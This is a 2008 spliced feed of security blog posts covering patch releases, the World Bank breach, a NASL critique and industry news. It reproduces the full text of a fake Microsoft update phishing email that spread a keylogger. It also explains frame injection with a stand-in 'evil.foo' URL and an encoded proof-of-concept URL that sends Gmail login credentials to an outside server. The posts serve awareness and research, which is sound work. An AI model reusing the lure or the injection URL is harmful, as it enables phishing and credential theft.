Sunday, October 12, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Cyber Attack Data-Sharing Is Lacking, Congress Told [Security Circus]

Posted: 12 Oct 2008 04:57 AM CDT

I already pointed this out in my 2007 Black Hat presentation, and this is exactly why the WOMBAT project was formed in the first place.

(Image) [Security Circus]

Posted: 12 Oct 2008 04:51 AM CDT

8964_e390_400

This posting includes an audio/video/photo media file: Download Now

OSX Update 10.5.5 and Security Update 2008-006 [Random Thoughts from Joel's World]

Posted: 11 Oct 2008 04:22 PM CDT

Just hitting the streets, as we speak, Apple released OSX update 10.5.5. Built into 10.5.5 is Security Update 2008-006, marking the 6th major security update of the year. So aside from the ton of updates in 10.5.5 for OSX Leopard, check out the below updates included with it.

Keep in mind that Security Update is not just for 10.5 (OSX Leopard), being that it is also available for 10.4, Desktop and Server releases.

This update releases updates to the following items:

ATS -- Apple Type Services -- CVE-2008-2305

BIND --

10.5 -- Updated to 9.4.2-P2

10.4.11 -- Updated to 9.3.5-P2

ClamAV -- Antivirus included with OSX Server

Updated to version 0.93.3.

CVE-2008-1100, CVE-2008-1387, CVE-2008-0314, CVE-2008-1833, CVE-2008-1835, CVE-2008-1836, CVE-2008-1837, CVE-2008-2713, CVE-2008-3215

Directory Services x2 -- (Something I found interesting -- Vulnerability reported by the "IT Department of the West Seneca Central School District". Not your usual reporter. Very nice) -- CVE-2008-2329

Finder x2 -- CVE-2008-2331, CVE-2008-3613

ImageIO x4 -- CVE-2008-2327, CVE-2008-2332, CVE-2008-3608, CVE-2008-1382

Kernel -- CVE-2008-3609

libresolv -- CVE-2008-1447

Login Windows x2 -- CVE-2008-3610, CVE-2008-3611

mDNSResolver -- CVE-2008-1447

OpenSSH -- CVE-2008-1483, CVE-2008-1657

QuickDraw Manager -- CVE-2008-3614

Ruby -- CVE-2008-2376

SearchKit -- CVE-2008-3616

System Configuration -- CVE-2008-2312 (For 10.4.11)

System Preferences x2 -- CVE-2008-3617, CVE-2008-3618

Time Machine -- CVE-2008-3619

VideoConference -- CVE-2008-3621

Wiki Server -- CVE-2008-3622

So, all in all, quite a few updates here in this one.

Subscribe in a reader

"The intelligence of that creature known as a crowd is the square root of the ..." [Security Circus]

Posted: 11 Oct 2008 02:54 PM CDT

The intelligence of that creature known as a crowd is the square root of the number of people in it. –Terry Pratchett, Jingo
Reposted from thoschsoup via astrid

(Image) [Security Circus]

Posted: 11 Oct 2008 02:24 PM CDT

8268_4f00_400

Reposted from derdritte

This posting includes an audio/video/photo media file: Download Now

A Day in the Life of Conservative Joe [Security Circus]

Posted: 11 Oct 2008 02:22 PM CDT

RaiNews24 interviews a US military veteran who says in 1991 a small tactical nuclear bomb was used in Iraq [Security Circus]

Posted: 11 Oct 2008 02:07 PM CDT

"you are going to be embarrassed, ashamed, labeled as an idiot, shunned, ridic..." [Security Circus]

Posted: 11 Oct 2008 01:39 PM CDT

you are going to be embarrassed, ashamed, labeled as an idiot, shunned, ridiculed, and occasionally driven from the village with pitchforks. on average, YOU ARE GOING TO FAIL. MULTIPLE TIMES, in NEW & INTERESTING ways. GET USED TO IT. –Dave McClure: Fear is the Mind Killer of the Silicon Valley Entrepreneur
Reposted from c3o

(Image) [Security Circus]

Posted: 11 Oct 2008 01:39 PM CDT

3541_e3fa_400

Reposted from jessor via Sixtus

This posting includes an audio/video/photo media file: Download Now

Ammanettato davanti a una scuola [Security Circus]

Posted: 11 Oct 2008 01:29 PM CDT

"The most extensive government report to date on whether terrorists can be ide..." [Security Circus]

Posted: 11 Oct 2008 12:04 PM CDT

The most extensive government report to date on whether terrorists can be identified through data mining has yielded an important conclusion: It doesn't really work. A National Research Council report, years in the making and scheduled to be released Tuesday, concludes that automated identification of terrorists through data mining or any other mechanism "is neither feasible as an objective nor desirable as a goal of technology development efforts." Inevitable false positives will result in "ordinary, law-abiding citizens and businesses" being incorrectly flagged as suspects. –Government report: Data mining doesn't work well

Microsoft's October Patch Release Advance Notice [Sunnet Beskerming Security Advisories]

Posted: 11 Oct 2008 08:26 AM CDT

Microsoft's Security Response Centre has provided advanced notification of this month's expected Microsoft security patches.

After only a handful of patches were released with September's update Microsoft are expecting to release 11 patches for October.

Of the 11 patches, four attract Microsoft's highest rating, of Critical. These patches are expected for Windows, Host Integration Server, Office, and a cumulative Internet Explorer patch.

The six patches labelled as Important are all for Windows, while the Moderate patch will be for Office.

While it would be expected that all of the Critical patches are for remote code execution opportunities (and they are), some of the Important patches are also for remote code execution problems. Given that Microsoft has done this in the past, it suggests that the affected components are not present in a default Windows installation and that some level of user modification / configuration is required away from the standard installation in order for them to be vulnerable.

Users of Microsoft Office on OS X should also expect to receive updates for some of the Office vulnerabilities.

In addition to the routine updates to the Malicious Software Removal Tool, and the high-priority, non-security updates, Microsoft will be introducing the Exploitability Index alongside this month's patches. The tool was introduced at this year's Black Hat conference in Las Vegas. It will be interesting to watch to see if the addition of the Index provides any extra benefit to users and administrators, or if it merely identifies which vulnerabilities are more vulnerable to exploitation if left unpatched.

Contributing Writer: Truth to Power [The Falcon's View]

Posted: 10 Oct 2008 06:24 PM CDT

As of this week, I'm an official core guide for "Practical Security" on a new collaboration site, Truth to Power (T2P). So, what is T2P? From their "About Us" section:"Truth to Power is about the control of information. It is...

Friday Summary, 10-10-2008 [securosis.com]

Posted: 10 Oct 2008 05:13 PM CDT

What a wild, wacky, crazy week. I have a funny suspicion a lot of stock brokers and investors are scraping together their spare change for some major liquid escapes this weekend. As a small business we haven’t felt the impact yet, but we are keeping a close eye on things and preparing to adjust our strategy as needed. Security deals are definitely slowing- we sense an impending rush of acquisitions, and a general feeling of nervousness. The need for security never goes away, but if you aren’t making plans to protect yourself through this crisis, *you* might go away. Someone responded to a Twitter post of mine that this will be over before the next president takes office; I can’t possibly imagine that happening.
Meanwhile, we watched the usual spectacle of the Presidential debate. Since I already know who I’m voting for, I’m not sure why I watch them at all. Like NASCAR, I suppose I don’t want to miss out when someone smashes into the wall and bursts into flames. On the security front, this week we saw more clickjacking details emerge, Apple release a security update, the World Bank get totally pwned, and Symantec make a major acquisition at a good multiple. But don’t get too excited; we also know a lot of investors pushing early exits at low multiples to save what they can. I don’t mean to focus so much on the finance side of the security world, but I think we’re going to see it bleed into our daily operations as the vendor landscape shifts around.
Over here at Securosis central I continued to geek out and work on our infrastructure. We may be small, but we’re trying to set up some cool collaboration tools to support us as we grow. For you other small business types, the wiki/blog/calendar/mail group integration of OS X Server works surprisingly well, although I don’t think it would be my first choice for an external web server. I just wish it would index documents attached to the wiki. I also ordered a Drobo for our backups and I’ll let you all know how it works.
Oh- and on my run yesterday I saw two coyotes in the park near our house watching me. Very cool.

Webcasts, Podcasts, and Conferences:

  • Martin and I have started broadcasting the Network Security Podcast live as we record it. In episode 123 (my luggage combination!) we talk about electronic voting, China spying, and clickjacking.
  • If you didn’t catch it in the October print edition of Macworld, here’s the online version of the firewall article I coauthored with Chris Pepper.
  • I wrote an article on mobile phone networks for TidBITS that made the front page of Slashdot. I think it’s about the 6th time I’ve hit the front page this year, which is pretty wacky. The TidBITS server had a massive failure unrelated to the Slashdot load right after the article was linked (oops).
  • I was quoted over at Dark Reading on the license changes to Metasploit 3.2. I know I wrote that quote, but reading it now it comes off strangely ambiguous. For the record, I think it’s a great change that will really drive some interesting things in the pen testing software world.
  • Adrian and I were invited by Jeremiah Grossman to a lunch event here in Phoenix with his company (WhiteHat Security) and F5. It was nice to finally get a demo of the F5/WhiteHat integration (WhiteHat generates dynamic WAF rules on the F5 box to block validated vulnerabilities; it’s pretty cool). Jeremiah also showed us his clickjacking code/demo. I almost wondered if I downplayed it too much after seeing it at work. On the bad side, some slimeballs from a local ISP decided to show up, enjoy a free lunch, and proceed to hit up every single one of us there as their personal sales prospects. I pretended I was out of business cards, but they snagged one of Adrian’s so he’ll get the call. Talk about low.

Favorite Securosis Posts:

  • Rich: Clickjacking Details, Analysis, and Advice. I tried to put some context around it, and talk about the overall impact. Direct from Rsnake is some advice on limiting the exploit.
  • Adrian: Symantec Buys MessageLabs. Symantec pays a hefty price, but they land a leader in SaaS email security and fill out their messaging security portfolio.

Favorite Outside Posts:

  • Adrian: I had trouble naming any single post my favorite for the week. There was a most shocking, a scariest, a most depressing and a most sadly illuminating. I am going with the illuminating look into the minds of Sequoia Capital and their reactions to the current financial crisis. This should look a lot like the tech crash of 2001, and frankly, I hope this information was conveyed to their portfolio companies 9-12 months ago as the window to react has passed.
  • Rich: Gunnar Peterson’s Innovators, Imitators, and Idiots. Just a great post that I need to blog about more fully later.

Top News:

Blog Comment of the Week:
Christophe’s comment on My “Policies, Plans, and Procedures” post:
Alas, I work in a former communist country where people were used to signing awful things, and hide whatever they did from upper eyes. I sure have an agreement, signed by all users, stating their responsibility, but that means almost nothing to them…

Time for happy hour with some of our local financial analyst friends. Smart guys who are doing well through this mess, so we plan on getting them loaded and sucking up the advice.
-Rich

Security Update for OS Microsoft Windows [mxlab - all about anti virus and anti spam]

Posted: 10 Oct 2008 01:17 PM CDT


MX lab intercepted emails with the subject “Security Update for OS Microsoft Windows” with a rather long email with the instructions to run the attached file named, in this case, KB934178.exe, which is a keylogger program that can capture all user keystrokes. It is known by Sophos as Mal/EncPk-CZ and F-Secure as Trojan-Spy.Win32.Goldun.bce. The message even includes a PGP sugnature to make it even more realistic.

The author has some some basic home work. Steve Lipner is indeed working for Microsoft as Senior Director of Security Engineering Strategy in Trustworthy Computing (found it on the net - what a title by the way) and has published the book The Security Development Lifecycle. You can also read some blog articles from Steve Lipner, and other authors, at http://blogs.msdn.com/sdl/default.aspx.

Dear Microsoft Customer,

Please notice that Microsoft company has recently issued a Security Update for OS Microsoft Windows. The update applies to the following OS versions: Microsoft Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows XP, Microsoft Windows Vista.

Please notice, that present update applies to high-priority updates category. In order to help protect your computer against security threats and performance problems, we strongly recommend you to install this update.

Since public distribution of this Update through the official website http://www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all Microsoft Windows OS users.

As your computer is set to receive notifications when new updates are available, you have received this notice.

In order to start the update, please follow the step-by-step instruction:

1. Run the file, that you have received along with this message.
2. Carefully follow all the instructions you see on the screen.

If nothing changes after you have run the file, probably in the settings of your OS you have an indication to run all the updates at a background routine. In that case, at this point the upgrade of your OS will be finished.

We apologize for any inconvenience this back order may be causing you.

Thank you,
Steve Lipner
Director of Security Assurance
Microsoft Corp.

—–BEGIN PGP SIGNATURE—–

Version: PGP 7.1

794OF0ZAO22DKAJUOQV1SEBNKIAM6AFIC2YR1ZHA6W55L9J2V4890Z7WGV56F
MZ63FIE80ZXC41KFNK6GK6WA2DBBS259GL8SMT8I83MEXOSZVIU3KRQR31J6YA
NFAR62PDBLEJIOW47E55XF1Y4D757C911KXRFK9ANFOBOF0BIEMGPO8CIC6O3IK
7Y487P92KYTZCTBWL5J069T69DT8MDDHAMGQX45BSMTOSYMZ43TNM81R8BPA
WQDN9MP3VX3PR14QTRJXT5G94IR2CDKAVMU56ZV48J69K5FPQ==
—–END PGP SIGNATURE—–

Virus Total permalink and MD5: 1ffcb1ea024c228ade6d8dad681c6ed7.

As a general rule, Windows only distributes patches and security update through Windows Update on your computer. Every other way of distribution by email is not recommended at all.

      

Pwnage of World Bank [Donkey On A Waffle]

Posted: 10 Oct 2008 12:23 PM CDT

At a time when the financial crsis is taking the DOW below 8000pts and the world economy is starting to feel some of the repercussions, a high profile security breach is being reported. The World Bank has been under siege for at least a year and more information and details regarding the intrusions was published today by Fox News.

The first breach of the bank's secrets was discovered in September, 2007, after the FBI .while at work on a different cybercrime case . notified the bank that something was wrong. The feds pointed to a part of the bank's network that led out of the Johannesburg hub of the International Finance Corp. (IFC), a bank arm that lends to the private sector.

The second major breach . of the bank's treasury network in Washington . was discovered in April 2008. The World Bank's Treasury manages $70 billion in assets for 25 clients . including the central banks of some countries. It carries out substantial collaborations with the world's finance ministers on public wealth and debt management, runs an active bond-trading desk in Washington, and does everything from currency trading to capital markets financings.

What really makes this particular breach interesting (besides the target) is that at least one portion of the intrusion was allegedly sourced from one of the largest outsourcing firms in India. Why does the government and major financial institutions insist on the outsourcing model when it is readily apparent that the security of these organizations just isn't there. To really bring this home, how much of our software development has companies like Cisco, Microsoft, and even security vendors like Symantec outsourced to India. Obviously any is too much. If we really must continue to outsource overseas there really needs to be a requirement for independent security assessment of all outsourced development. *GASP* who would have thunk it.

NOTE: Fixed broken link. Thanks Scott.

We don’t need NASL - OpenVAS [GNUCITIZEN]

Posted: 10 Oct 2008 11:35 AM CDT

For those of you who are new to these things, NASL stands for Nessus Attack Scripting Language. NASL is part of the closed-source Nessus vulnerability scanner and its open-source form called OpenVAS (Open Vulnerability Assessment System).

Beautiful Blue Beetle

Nessus plays big part in the hearts of many administrators, security consultants and scanning vendors. Nessus practically was the first stable and well maintained open-source security scanner until they closed the source.

So, what about NASL? My point is that we don’t need it. Recently I had to work with OpenVas and Nessus in order to automate some trivial penetration testing practices. I’ve worked with both and I got fed up with NASL. I still cannot understand why on earth we need yet another general purpose scripting language which looks like some kind of a hybrid between PHP, C and JavaScript.

Anyway, so since version 3 Nessus is closed source. Now we have OpenVAS, a 2.x fork of Nessus. The project is coming nice but still far from begin good enough for environments where stability is a must. At some point I decided to contribute since I am particularly interested in haviong a free Nessus clone with a good community behind it. As soon as I started putting down some code I realized that this is not what I want. Nessus’ code seems undeservingly complicated.

In reality I do not need Nessus neither NASL. All I need are the tests. I believe that everybody feels the same. Perhaps the whole OpenVAS project should concentrate on writing the tests and let the user choose the engine. In my case Nessus was not a good engine due to license limitations. OpenVAS was not a good fit as well because of stability reasons. I am stuck!

It occurred to me that because NASL is very close in syntax to PHP, JavaScript and C, it will be actually easy to rewrite the scripts in a more suitable language that has a better community around it. Of course everything needs to be done in an automatic fashion because I hardly doubt that anyone have the personal time to sit and rewrite boring NASL scripts, unless he is paid good money for. This is not how things work in the open-source world though.

IMHO, the rewrite of these scripts can be achieved with some simple regex replacements. The testing engine can be easily composed of drag-and-drop JAR components, i.e. the whole things will run on the top of Java for portability reasons. I think that this might turn into much better framework which actually encourages people to put contributions.

Unfortunately, I do not have the time to start such a project although I will most certainly contribute. I hope that someone is willing to take on the challenge. Any takers?

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Brute force WIFI with NVidia
We don't need NASL - OpenVAS
Let's bring back the Attack to the API
Frame Injection Fun
Put your hand out an see if you get cut.

Kelvin Steele Made Me Do It [Vitalsecurity.org - A Revolution is the Solution]

Posted: 10 Oct 2008 11:34 AM CDT



Spammers: Encouraging us to kill our significant others since 2008.

Mail Goggles [securosis.com]

Posted: 09 Oct 2008 10:07 PM CDT

Someone at Google has created Mail Goggles. It’s a little Gmail utility to keep you from sending out email while, uh, under the influence. Jon Perlow, the author, had this to say …

[snip]

“Sometimes I send messages I shouldn’t send. Like the time I told that girl I had a crush on her over text message. Or the time I sent that late night e-mail to my ex-girlfriend that we should get back together,”

[/snip]

And who hasn’t, really? It’s no wonder I am not smart enough to work at Google. I would never have thought this up, never mind actually coding it. I checked, and it’s really there, under the Lab’s section, along with a dozen or so other productivity tools. I really think they could be onto something here … just consider this from a “Reputational Risk” perspective; this could be a hot product for Postini. One too many Martinis with lunch? Drowning your sorrows as you watch your stock portfolio plunge? A little testy that your “spa dayexecutive retreat was cancelled? No problem, Google will quarantine your outbound email! And if you’re too drunk to remember to turn this off, your email probably should be sequestered. Hoff was right, Google really is becoming a security company. Now, where did I leave that glass of bourbon …

-Adrian

The State of American Government and Politics [The Falcon's View]

Posted: 09 Oct 2008 09:09 PM CDT

If you've read this blog before, you know I'm a wee bit vexed by the current state of corruption and lunacy in the US Government. Here I offer a few more examples of just how scary-crazy things are getting. Illegal...

Frame Injection Fun [GNUCITIZEN]

Posted: 09 Oct 2008 07:01 PM CDT

Frame injection vulnerabilities, although some people might consider them the same as HTML injection/XSS or even a subset, they really are not the same.

Here is why:

  • There is no need to inject special control characters such as angle brackets (unlike HTMLi/XSS)
  • HTMLi/XSS filtering routines will not project against frame injection since the attacker only needs to insert a URL in the non-sanitized parameter

The best way to explain what I mean is to show an example. Most frame injection issues occur in web applications because dynamic frameset/iframe insertion is not implemented with enough filtering. For instance, say that we have the following URL on the target site:

https://www.victim.foo/index.php?targeturl=/contact.php

A malicious user with intentions of launching a phishing attack will try tampering the targeturl parameter. His goal is to insert a third-party page that is under his control, rather than the original contact page. Indeed, index.php, although is not allowing HTML or JavaScript to be assigned to targeturl, is happy to process an absolute URL rather than a relative one:

https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php

I thought that showing a live example would help our readers get an idea of what frame injection looks in action. For that purpose, I prepared a rather not elegant proof of concept which takes advantage of the Google Images service. What’s neat is that although the legitimate URL would normally use the images.google.com domain, Google also allow us to use other google.com subdomains such as mail.google.com which is used by Gmail. This is ideal, as we’re trying to accomplish a frame injection attack which can be used to perform phishing attacks against Gmail users.

http://mail.google.com/imgres?imgurl=http://SecureGoogleMail&imgrefurl=%68%74%74%70%3a%2f%2f%73%6e%69%70%75%72%6c%2e%63%6f%6d/482f3

The previous PoC URL will cause the entered credentials to be submitted to www.gnucitizen.org when clicking on Sign in, so please do NOT submit any real credentials!

In short: The attacker has managed to display a non-legitimate third-party page, while the legitimate domain (mail.google.com in this case) is shown in the address bar.The beauty of frame injection attacks is that the attacker is able to impersonate a trusted entity without needing to bypass XSS/HTMLi filters or even break into the target server.

Needless to say, in real-life the attacker would most likely automate the process of obtaining the harvested credentials by using a tool such as our x.php data-theft script.

---
gnucitizen information security gigs part of the cutting-edge network:

---
recent posts from the gnucitizen cutting-edge network:

Brute force WIFI with NVidia
We don't need NASL - OpenVAS
Let's bring back the Attack to the API
Frame Injection Fun
Put your hand out an see if you get cut.

No comments: